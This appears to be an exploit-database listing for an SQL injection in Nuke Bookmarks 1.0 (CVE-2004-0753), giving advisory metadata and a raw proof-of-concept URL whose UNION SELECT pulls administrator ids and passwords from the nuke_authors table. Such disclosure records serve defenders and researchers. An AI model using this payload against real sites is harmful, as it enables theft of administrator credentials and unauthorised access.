header-logo
Suggest Exploit
vendor:
Nuke Bookmarks
by:
NGSSoftware Insight Security Research
8.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Nuke Bookmarks
Affected Version From: Nuke Bookmarks 1.0
Affected Version To: Nuke Bookmarks 1.0
Patch Exists: No
Related CWE: CVE-2004-0753
CPE: a:nukesite:nuke_bookmarks
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2004-0753/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2004

Nuke Bookmarks SQL Injection Vulnerability

Nuke Bookmarks is prone to an SQL injection vulnerability. This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12908/info

Nuke Bookmarks is prone to an SQL injection vulnerability.

This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. 

http://www.nukesite.com/modules.php?name=Bookmarks&file=marks&catname=1&category=-1/**/union/**/select%200,aid,0,pwd,0,0%20from%20nuke_authors

Navigation

Suggest Exploit

Services By CQR